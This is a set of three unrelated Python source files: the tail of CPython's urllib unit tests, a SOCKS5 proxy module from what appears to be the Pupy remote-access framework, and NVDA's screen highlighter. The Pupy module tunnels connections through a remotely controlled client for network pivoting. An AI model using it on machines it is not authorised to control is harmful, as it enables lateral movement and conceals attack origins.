self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers"), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_.-"
do_not_quote = ''.join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
result = urllib.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
self.assertRaises(TypeError, urllib.quote, None)
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the docstring for QuotingTests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped; %s" %
result)
result = urllib.unquote_plus(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote_plus(): not all characters escaped: "
"%s" % result)
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = '\xab\xea'
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
The test cannot assume anything about ordering, since the docs make no
guarantee and the input may be a dictionary.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test that automatic quoting and unquoting work for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the nturl2path library')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.url2pathname(url)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of the password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.splitpasswd('user:a:b'))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work OK, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
socks5proxy.py
|
# -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
#RFC @https://www.ietf.org/rfc/rfc1928.txt
from pupylib.PupyModule import *
import StringIO
import SocketServer
import threading
import socket
import logging
import struct
import traceback
import time
__class_name__="Socks5Proxy"
CODE_SUCCEEDED='\x00'
CODE_GENERAL_SRV_FAILURE='\x01'
CODE_CONN_NOT_ALLOWED='\x02'
CODE_NET_NOT_REACHABLE='\x03'
CODE_HOST_UNREACHABLE='\x04'
CODE_CONN_REFUSED='\x05'
CODE_TTL_EXPIRED='\x06'
CODE_COMMAND_NOT_SUPPORTED='\x07'
CODE_ADDRESS_TYPE_NOT_SUPPORTED='\x08'
CODE_UNASSIGNED='\x09'
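# These are the REP values from RFC 1928 section 6; _socks_response() below
# packs the chosen code into a reply of the form
#   VER(0x05) | REP | RSV(0x00) | ATYP(0x01) | BND.ADDR(4) | BND.PORT(2)
# using this proxy's own listening address as BND.ADDR/BND.PORT.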
class SocketPiper(threading.Thread):
def __init__(self, read_sock, write_sock):
threading.Thread.__init__(self)
self.daemon=True
self.read_sock=read_sock
self.write_sock=write_sock
def run(self):
try:
self.read_sock.setblocking(0)
while True:
data=""
try:
data+=self.read_sock.recv(1000000)
if not data:
break
except Exception as e:
if e[0]==9: # errno 9 (EBADF): socket was closed
break
if not data:
time.sleep(0.05)
continue
self.write_sock.sendall(data)
except Exception as e:
logging.debug("error in socket piper: %s"%str(traceback.format_exc()))
finally:
try:
self.write_sock.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.write_sock.close()
except:
pass
try:
self.read_sock.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.read_sock.close()
except:
pass
logging.debug("piper finished")
class Socks5RequestHandler(SocketServer.BaseRequestHandler):
def _socks_response(self, code, terminate=False):
ip="".join([chr(int(i)) for i in self.server.server_address[0].split(".")])
port=struct.pack("!H",self.server.server_address[1])
self.request.sendall("\x05"+code+"\x00"+"\x01"+ip+port)
if terminate:
try:
self.request.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.request.close()
except:
pass
def handle(self):
self.request.settimeout(5)
VER=self.request.recv(1)
NMETHODS=self.request.recv(1)
METHODS=self.request.recv(int(struct.unpack("!B",NMETHODS)[0]))
"""
o X'00' NO AUTHENTICATION REQUIRED
o X'01' GSSAPI
o X'02' USERNAME/PASSWORD
o X'03' to X'7F' IANA ASSIGNED
o X'80' to X'FE' RESERVED FOR PRIVATE METHODS
o X'FF' NO ACCEPTABLE METHODS
"""
# for now, only "no authentication required" is supported:
self.request.sendall("\x05\x00")
VER=self.request.recv(1)
if VER!="\x05":
self.server.module.error("receiving unsuported socks version: %s"%VER.encode('hex'))
self._socks_response(CODE_GENERAL_SRV_FAILURE, terminate=True)
return
CMD=self.request.recv(1)
if CMD!="\x01": # we only support CONNECT for now
self.server.module.error("receiving unsuported socks CMD: %s"%CMD.encode('hex'))
self._socks_response(CODE_COMMAND_NOT_SUPPORTED, terminate=True)
return
RSV=self.request.recv(1)
DST_ADDR=None
DST_PORT=None
ATYP=self.request.recv(1)
if ATYP=="\x01":
DST_ADDR=".".join([str(ord(x)) for x in self.request.recv(4)])
DST_PORT=struct.unpack("!H",self.request.recv(2))[0]
elif ATYP=="\x03":
DOMAIN_LEN=int(struct.unpack("!B",self.request.recv(1))[0])
DST_ADDR=self.request.recv(DOMAIN_LEN)
DST_PORT=struct.unpack("!H",self.request.recv(2))[0]
else: #TODO: ipv6
self.server.module.error("atyp not supported: %s"%ATYP.encode('hex'))
self._socks_response(CODE_ADDRESS_TYPE_NOT_SUPPORTED, terminate=True)
return
# now we have all we need; open the socket, proxied through rpyc :)
self.server.module.info("connecting to %s:%s ..."%(DST_ADDR,DST_PORT))
rsocket_mod=self.server.rpyc_client.conn.modules.socket
rsocket=rsocket_mod.socket(rsocket_mod.AF_INET,rsocket_mod.SOCK_STREAM)
rsocket.settimeout(5)
try:
rsocket.connect((DST_ADDR, DST_PORT))
except Exception as e:
self.server.module.error("error %s connecting to %s:%s ..."%(str(e),DST_ADDR,DST_PORT))
if e[0]==10060:
self._socks_response(CODE_HOST_UNREACHABLE, terminate=True)
else:
self._socks_response(CODE_NET_NOT_REACHABLE, terminate=True)
return
self._socks_response(CODE_SUCCEEDED)
self.server.module.success("connection to %s:%s succeed !"%(DST_ADDR,DST_PORT))
#self.request.settimeout(30)
#rsocket.settimeout(30)
sp1=SocketPiper(self.request, rsocket)
sp2=SocketPiper(rsocket, self.request)
sp1.start()
sp2.start()
sp1.join()
sp2.join()
self.server.module.info("conn to %s:%s closed"%(DST_ADDR,DST_PORT))
class Socks5Server(SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True, rpyc_client=None, module=None):
self.rpyc_client=rpyc_client
self.module=module
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
class ThreadedSocks5Server(SocketServer.ThreadingMixIn, Socks5Server):
pass
@config(cat="network", tags=["pivot", "proxy"])
class Socks5Proxy(PupyModule):
""" start a socks5 proxy going through a client """
max_clients=1
unique_instance=True
daemon=True
server=None
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='socks5proxy', description=self.__doc__)
self.arg_parser.add_argument('-p', '--port', default='1080')
self.arg_parser.add_argument('action', choices=['start','stop'])
def stop_daemon(self):
self.success("shuting down socks server ...")
if self.server:
self.server.shutdown()
del self.server
self.success("socks server shut down")
else:
self.error("server is None")
def run(self, args):
if args.action=="start":
if self.server is None:
self.success("starting server ...")
self.server = ThreadedSocks5Server(("127.0.0.1", int(args.port)), Socks5RequestHandler, rpyc_client=self.client, module=self)
t=threading.Thread(target=self.server.serve_forever)
t.daemon=True
t.start()
self.success("socks5 server started on 127.0.0.1:%s"%args.port)
else:
self.error("socks5 server is already started !")
elif args.action=="stop":
if self.server:
self.job.stop()
del self.job
self.success("socks5 server stopped !")
else:
self.error("socks5 server is already stopped")
|
NVDAHighlighter.py
|
# visionEnhancementProviders/NVDAHighlighter.py
# A part of NonVisual Desktop Access (NVDA)
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
# Copyright (C) 2018-2019 NV Access Limited, Babbage B.V., Takuya Nishimoto
"""Default highlighter based on GDI Plus."""
import vision
from vision.constants import Role, Context
from vision.util import getContextRect
from windowUtils import CustomWindow
import wx
import gui
import api
from ctypes import byref, WinError
from ctypes.wintypes import COLORREF, MSG
import winUser
from logHandler import log
from mouseHandler import getTotalWidthAndHeightAndMinimumPosition
from locationHelper import RectLTWH
from collections import namedtuple
import threading
import winGDI
import weakref
from colors import RGB
import core
import driverHandler
class HighlightStyle(
namedtuple("HighlightStyle", ("color", "width", "style", "margin"))
):
"""Represents the style of a highlight for a particular context.
@ivar color: The color to use for the style
@type color: L{RGB}
@ivar width: The width of the lines to be drawn, in pixels.
A higher width reduces the inner dimensions of the rectangle.
Therefore, if you need to increase the outer dimensions of the rectangle,
you need to increase the margin as well.
@type width: int
@ivar style: The style of the lines to be drawn;
One of the C{winGDI.DashStyle*} enumeration constants.
@type style: int
@ivar margin: The number of pixels between the highlight's rectangle
and the rectangle of the object to be highlighted.
A higher margin stretches the highlight's rectangle.
This value may also be negative.
@type margin: int
"""
BLUE = RGB(0x03, 0x36, 0xFF)
PINK = RGB(0xFF, 0x02, 0x66)
YELLOW = RGB(0xFF, 0xDE, 0x03)
DASH_BLUE = HighlightStyle(BLUE, 5, winGDI.DashStyleDash, 5)
SOLID_PINK = HighlightStyle(PINK, 5, winGDI.DashStyleSolid, 5)
SOLID_BLUE = HighlightStyle(BLUE, 5, winGDI.DashStyleSolid, 5)
SOLID_YELLOW = HighlightStyle(YELLOW, 2, winGDI.DashStyleSolid, 2)
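# A custom style can be composed from the same fields, e.g. (hypothetical,
# not used below) HighlightStyle(RGB(0xFF, 0x00, 0x00), 3, winGDI.DashStyleDash, 0)
# would draw a thin dashed red rectangle with no extra margin.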
class HighlightWindow(CustomWindow):
transparency = 0xff
className = u"NVDAHighlighter"
windowName = u"NVDA Highlighter Window"
windowStyle = winUser.WS_POPUP | winUser.WS_DISABLED
extendedWindowStyle = winUser.WS_EX_TOPMOST | winUser.WS_EX_LAYERED
transparentColor = 0 # Black
@classmethod
def _get__wClass(cls):
wClass = super()._wClass
wClass.style = winUser.CS_HREDRAW | winUser.CS_VREDRAW
wClass.hbrBackground = winGDI.gdi32.CreateSolidBrush(COLORREF(cls.transparentColor))
return wClass
def updateLocationForDisplays(self):
if vision._isDebug():
log.debug("Updating NVDAHighlighter window location for displays")
displays = [wx.Display(i).GetGeometry() for i in range(wx.Display.GetCount())]
screenWidth, screenHeight, minPos = getTotalWidthAndHeightAndMinimumPosition(displays)
# Hack: Windows has a "feature" that will stop desktop shortcut hotkeys from working
# when a window is full screen.
# Removing one line of pixels from the bottom of the screen will fix this.
left = minPos.x
top = minPos.y
width = screenWidth
height = screenHeight - 1
self.location = RectLTWH(left, top, width, height)
winUser.user32.ShowWindow(self.handle, winUser.SW_HIDE)
if not winUser.user32.SetWindowPos(
self.handle,
winUser.HWND_TOPMOST,
left, top, width, height,
winUser.SWP_NOACTIVATE
):
raise WinError()
winUser.user32.ShowWindow(self.handle, winUser.SW_SHOWNA)
def __init__(self, highlighter):
if vision._isDebug():
log.debug("initializing NVDAHighlighter window")
super(HighlightWindow, self).__init__(
windowName=self.windowName,
windowStyle=self.windowStyle,
extendedWindowStyle=self.extendedWindowStyle,
parent=gui.mainFrame.Handle
)
self.location = None
self.highlighterRef = weakref.ref(highlighter)
winUser.SetLayeredWindowAttributes(
self.handle,
self.transparentColor,
self.transparency,
winUser.LWA_ALPHA | winUser.LWA_COLORKEY)
self.updateLocationForDisplays()
if not winUser.user32.UpdateWindow(self.handle):
raise WinError()
def windowProc(self, hwnd, msg, wParam, lParam):
if msg == winUser.WM_PAINT:
self._paint()
# Ensure the window is top most
winUser.user32.SetWindowPos(
self.handle,
winUser.HWND_TOPMOST,
0, 0, 0, 0,
winUser.SWP_NOACTIVATE | winUser.SWP_NOMOVE | winUser.SWP_NOSIZE
)
elif msg == winUser.WM_DESTROY:
winUser.user32.PostQuitMessage(0)
elif msg == winUser.WM_TIMER:
self.refresh()
elif msg == winUser.WM_DISPLAYCHANGE:
# wx might not be aware of the display change at this point
core.callLater(100, self.updateLocationForDisplays)
def _paint(self):
highlighter = self.highlighterRef()
if not highlighter:
# The highlighter instance died unexpectedly, kill the window as well
winUser.user32.PostQuitMessage(0)
return
contextRects = {}
for context in highlighter.enabledContexts:
rect = highlighter.contextToRectMap.get(context)
if not rect:
continue
elif context == Context.NAVIGATOR and contextRects.get(Context.FOCUS) == rect:
# When the focus overlaps the navigator object, which is usually the case,
# show a different highlight style.
# Focus is in contextRects, do not show the standalone focus highlight.
contextRects.pop(Context.FOCUS)
# Navigator object might be in contextRects as well
contextRects.pop(Context.NAVIGATOR, None)
context = Context.FOCUS_NAVIGATOR
contextRects[context] = rect
if not contextRects:
return
with winUser.paint(self.handle) as hdc:
with winGDI.GDIPlusGraphicsContext(hdc) as graphicsContext:
for context, rect in contextRects.items():
HighlightStyle = highlighter._ContextStyles[context]
# Before calculating logical coordinates,
# make sure the rectangle falls within the highlighter window
rect = rect.intersection(self.location)
try:
rect = rect.toLogical(self.handle)
except RuntimeError:
log.debugWarning("", exc_info=True)
rect = rect.toClient(self.handle)
try:
rect = rect.expandOrShrink(HighlightStyle.margin)
except RuntimeError:
pass
with winGDI.GDIPlusPen(
HighlightStyle.color.toGDIPlusARGB(),
HighlightStyle.width,
HighlightStyle.style
) as pen:
winGDI.gdiPlusDrawRectangle(graphicsContext, pen, *rect.toLTWH())
def refresh(self):
winUser.user32.InvalidateRect(self.handle, None, True)
class VisionEnhancementProvider(vision.providerBase.VisionEnhancementProvider):
name = "NVDAHighlighter"
# Translators: Description for NVDA's built-in screen highlighter.
description = _("NVDA Highlighter")
supportedRoles = frozenset([Role.HIGHLIGHTER])
supportedContexts = (Context.FOCUS, Context.NAVIGATOR, Context.BROWSEMODE)
_ContextStyles = {
Context.FOCUS: DASH_BLUE,
Context.NAVIGATOR: SOLID_PINK,
Context.FOCUS_NAVIGATOR: SOLID_BLUE,
Context.BROWSEMODE: SOLID_YELLOW,
}
refreshInterval = 100
customWindowClass = HighlightWindow
# Default settings for parameters
highlightFocus = True
highlightNavigator = True
highlightBrowseMode = True
_contextOptionLabelsWithAccelerators = {
# Translators: shown for a highlighter setting that toggles
# highlighting the system focus.
Context.FOCUS: _("Highlight system fo&cus"),
# Translators: shown for a highlighter setting that toggles
# highlighting the browse mode cursor.
Context.BROWSEMODE: _("Highlight browse &mode cursor"),
# Translators: shown for a highlighter setting that toggles
# highlighting the navigator object.
Context.NAVIGATOR: _("Highlight navigator &object"),
}
@classmethod
def _get_supportedSettings(cls):
return [
driverHandler.BooleanDriverSetting(
'highlight%s' % (context[0].upper() + context[1:]),
cls._contextOptionLabelsWithAccelerators[context],
defaultVal=True
)
for context in cls.supportedContexts
]
@classmethod
def canStart(cls) -> bool:
return True
def registerEventExtensionPoints(self, extensionPoints):
extensionPoints.post_focusChange.register(self.handleFocusChange)
extensionPoints.post_reviewMove.register(self.handleReviewMove)
extensionPoints.post_browseModeMove.register(self.handleBrowseModeMove)
def __init__(self):
super(VisionEnhancementProvider, self).__init__()
self.contextToRectMap = {}
winGDI.gdiPlusInitialize()
self.window = None
self._highlighterThread = threading.Thread(target=self._run)
self._highlighterThread.daemon = True
self._highlighterThread.start()
def terminate(self):
if self._highlighterThread:
if not winUser.user32.PostThreadMessageW(self._highlighterThread.ident, winUser.WM_QUIT, 0, 0):
raise WinError()
self._highlighterThread.join()
self._highlighterThread = None
winGDI.gdiPlusTerminate()
self.contextToRectMap.clear()
super(VisionEnhancementProvider, self).terminate()
def _run(self):
if vision._isDebug():
log.debug("Starting NVDAHighlighter thread")
window = self.window = self.customWindowClass(self)
self.timer = winUser.WinTimer(window.handle, 0, self.refreshInterval, None)
msg = MSG()
while winUser.getMessage(byref(msg), None, 0, 0):
winUser.user32.TranslateMessage(byref(msg))
winUser.user32.DispatchMessageW(byref(msg))
